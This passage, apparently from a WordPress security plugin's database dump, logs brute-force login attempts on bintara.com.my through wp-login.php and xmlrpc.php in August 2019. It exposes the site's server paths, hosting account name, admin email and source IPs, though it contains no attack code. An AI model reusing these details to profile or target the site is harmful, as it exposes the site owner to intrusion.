Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"185.2.5.69\";s:11:\"REMOTE_PORT\";s:5:\"54218\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTQfotV65@1l3w0lHNa6gAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566888062.3367\";s:12:\"REQUEST_TIME\";s:10:\"1566888062\";}}','notice','2019-08-27 06:41:04','2019-08-27 06:41:03',18200744,19498440,'https://bintara.com.my/xmlrpc.php',1,0,'185.2.5.69'),(23386,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.18.82.241\";s:11:\"REMOTE_PORT\";s:5:\"37230\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTWSotV65@1l3w0lHNf6AAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566889546.3703\";s:12:\"REQUEST_TIME\";s:10:\"1566889546\";}}','notice','2019-08-27 07:05:47','2019-08-27 07:05:46',17685648,19175528,'https://bintara.com.my/wp-login.php',1,0,'178.18.82.241'),(23384,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"185.2.5.69\";s:11:\"REMOTE_PORT\";s:5:\"53608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTQeotV65@1l3w0lHNa5QAAAFA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566888058.7074\";s:12:\"REQUEST_TIME\";s:10:\"1566888058\";}}','notice','2019-08-27 06:41:00','2019-08-27 06:40:59',17684832,19175448,'https://bintara.com.my/wp-login.php',1,0,'185.2.5.69'),(23374,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.196.33\";s:11:\"REMOTE_PORT\";s:5:\"39732\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTFHWXkG1atThADMYGijgAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566885149.9514\";s:12:\"REQUEST_TIME\";s:10:\"1566885149\";}}','notice','2019-08-27 05:52:31','2019-08-27 05:52:30',17683016,19173664,'https://bintara.com.my/wp-login.php',1,0,'54.39.196.33'),(23375,0,'brute_force','invalid-login::username-jsjobs_jobseeker','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:16:\"jsjobs_jobseeker\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"484\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"54.39.196.33\";s:11:\"REMOTE_PORT\";s:5:\"40260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTFIbdCvC5@KvzqwiFBDQAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566885153.8904\";s:12:\"REQUEST_TIME\";s:10:\"1566885153\";}}','notice','2019-08-27 05:52:35','2019-08-27 05:52:34',18203192,19499512,'https://bintara.com.my/xmlrpc.php',1,0,'54.39.196.33'),(23376,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.87.174\";s:11:\"REMOTE_PORT\";s:5:\"51960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTHBrdCvC5@KvzqwiFCmAAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566885638.304\";s:12:\"REQUEST_TIME\";s:10:\"1566885638\";}}','notice','2019-08-27 06:00:40','2019-08-27 06:00:38',17685648,19175528,'https://bintara.com.my/wp-login.php',1,0,'103.81.87.174'),(23377,0,'brute_force','invalid-login::username-preview','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"preview\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.81.87.174\";s:11:\"REMOTE_PORT\";s:5:\"52434\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTHCbdCvC5@KvzqwiFCnAAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566885641.7967\";s:12:\"REQUEST_TIME\";s:10:\"1566885641\";}}','notice','2019-08-27 06:00:43','2019-08-27 06:00:42',18200416,19500384,'https://bintara.com.my/xmlrpc.php',1,0,'103.81.87.174'),(23378,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.201.249\";s:11:\"REMOTE_PORT\";s:5:\"25008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTJX7dCvC5@KvzqwiFECwAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566886240.1938\";s:12:\"REQUEST_TIME\";s:10:\"1566886240\";}}','notice','2019-08-27 06:10:42','2019-08-27 06:10:40',17684664,19175264,'https://bintara.com.my/wp-login.php',1,0,'46.101.201.249'),(23379,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.201.249\";s:11:\"REMOTE_PORT\";s:5:\"26792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTJaQ0@TGWC-1tzGX58gwAAAJQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566886249.351\";s:12:\"REQUEST_TIME\";s:10:\"1566886249\";}}','notice','2019-08-27 06:10:50','2019-08-27 06:10:49',18200848,19499864,'https://bintara.com.my/xmlrpc.php',1,0,'46.101.201.249'),(23380,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 